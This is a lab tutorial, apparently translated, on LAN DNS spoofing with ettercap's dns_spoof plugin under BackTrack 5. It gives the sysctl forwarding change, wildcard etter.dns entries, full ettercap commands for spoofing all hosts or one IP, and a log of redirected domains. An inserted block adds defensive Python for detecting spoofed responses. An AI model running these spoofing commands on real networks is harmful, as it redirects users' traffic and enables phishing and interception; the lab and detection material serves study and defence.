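Lab environment: BackTrack 5 R3
The BackTrack 5 IP address is 192.168.1.20
The LAN has two computers, 192.168.1.102 and 192.168.1.106, both XP machines
Before starting the experiment, install ettercap; the software can be found by searching on Baidu or on 51cto
After installation, complete the following steps
1. Edit the file /etc/sysctl.conf (vim /etc/sysctl.conf) and find
#net.ipv4.ip_forward=0, then change it to net.ipv4.ip_forward=1
Then run sysctl -p; this enables IP forwarding (routing).
2. Edit the file /usr/local/share/ettercap/etter.dns (vim /usr/local/share/ettercap/etter.dns)
Append entries in the following format at the end of the file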
*.com A 74.125.128.106
*.org A 74.125.128.106
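*.com is the suffix of the sites to spoof, that is, every site whose name ends in .com. For example, if the spoofed user enters www.baidu.com, they are sent to the site at IP address 74.125.128.106. The A in the middle means an A record. You can add more entries as needed, such as cn, cc, net, or use
the form *.baidu.com.
Then run ettercap -T -q -i eth0 -P dns_spoof // //
-T is text mode
-q runs in quiet mode
-i is the interface name
-P is the plugin to load (the dns_spoof plugin is used here)
// // spoofs everyone, excluding yourself
Once this command has been executed, the spoofing begins,
as follows: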
root@bt:~# ettercap -T -q -i eth0 -P dns_spoof // //
ettercap 0.7.4.1 copyright 2001-2011 ALoR & NaGA
Listening on eth0... (Ethernet)
eth0 -> 00:0C:29:4B:5C:BE 192.168.1.20 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
4 hosts added to the hosts list... // 4 hosts are added here
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
dns_spoof: [www.killdos.com] spoofed to [74.125.128.106]
dns_spoof: [www.microsoft.com] spoofed to [74.125.128.106]
dns_spoof: [www.google.com] spoofed to [74.125.128.106]
dns_spoof: [www.ab.com] spoofed to [74.125.128.106]
dns_spoof: [www.google.com] spoofed to [74.125.128.106]
dns_spoof: [www.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [ssl.gstatic.com] spoofed to [74.125.128.106]
dns_spoof: [accounts.google.com] spoofed to [74.125.128.106]
dns_spoof: [ditu.google.cn] spoofed to [74.125.128.106]
dns_spoof: [drive.google.com] spoofed to [74.125.128.106]
dns_spoof: [mail.google.com] spoofed to [74.125.128.106]
dns_spoof: [news.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [picasaweb.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [play.google.com] spoofed to [74.125.128.106]
dns_spoof: [plus.google.com] spoofed to [74.125.128.106]
dns_spoof: [translate.google.cn] spoofed to [74.125.128.106]
dns_spoof: [video.google.com.hk] spoofed to [74.125.128.106]
dns_spoof: [www.blogger.com] spoofed to [74.125.128.106]
dns_spoof: [www.googlesciencefair.com] spoofed to [74.125.128.106]
dns_spoof: [www.youtube.com] spoofed to [74.125.128.106]
The 74.125.128.106 I used here is a Google site, so any address I enter is redirected to Google's address
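Added example (not part of the original post): seen from the defending side, the wildcard entries in etter.dns leave a recognizable trace, because unrelated names all come back with the same A record, exactly as in the dns_spoof output above. The Python code below parses captured DNS response payloads and reports any answer address that was returned for several distinct domains; the function names, the threshold of 3 and the naive two-label domain grouping are assumptions made for this example.

```python
# Added example: flag one A record being returned for many unrelated domains.
import struct
from collections import defaultdict

def read_name(msg, off):
    """Decode a DNS name at off, following compression pointers; return (name, next offset)."""
    labels, nxt = [], None
    for _ in range(128):                          # hard bound defeats pointer loops
        n = msg[off]
        if n & 0xC0 == 0xC0:                      # compression pointer
            nxt = off + 2 if nxt is None else nxt
            off = ((n & 0x3F) << 8) | msg[off + 1]
        elif n == 0:
            return ".".join(labels), (off + 1 if nxt is None else nxt)
        else:
            labels.append(msg[off + 1:off + 1 + n].decode("ascii", "replace").lower())
            off += 1 + n
    raise ValueError("name too long or compression loop")

def a_records(msg):
    """Return (qname, [IPv4 answers]) for a single-question DNS response."""
    _, flags, qd, an = struct.unpack("!HHHH", msg[:8])
    if not flags & 0x8000 or qd != 1:
        raise ValueError("not a single-question response")
    qname, off = read_name(msg, 12)
    off += 4                                      # skip QTYPE and QCLASS
    ips = []
    for _ in range(an):
        _, off = read_name(msg, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        if rtype == 1 and rdlen == 4:             # A record
            ips.append(".".join(str(b) for b in msg[off + 10:off + 14]))
        off += 10 + rdlen
    return qname, ips

def fan_in(responses, threshold=3):
    """Map answer IP -> sorted distinct domains it was returned for, if >= threshold (assumed value)."""
    seen = defaultdict(set)
    for msg in responses:
        qname, ips = a_records(msg)
        for ip in ips:
            seen[ip].add(".".join(qname.split(".")[-2:]))  # naive grouping, no public-suffix list
    return {ip: sorted(d) for ip, d in seen.items() if len(d) >= threshold}

def sample_response(qname, ip):
    """Constructed sample data: a minimal DNS A response answering qname with ip."""
    q = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\0"
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 60, 4) + bytes(int(x) for x in ip.split("."))
    return struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0) + q + struct.pack("!HH", 1, 1) + rr
```

Feed fan_in() the UDP payloads of DNS responses seen by a client or sensor. Shared hosting and CDN addresses can also exceed the threshold, so treat a hit as a lead to verify against a trusted resolver.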
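Next, run the experiment against a single computer: stop ettercap and use ipconfig /flushdns to restore the computers to normal
Then enter the following: ettercap -T -q -i eth0 -P dns_spoof /IP to spoof/ //
For example: ettercap -T -q -i eth0 -P dns_spoof /192.168.1.105/ //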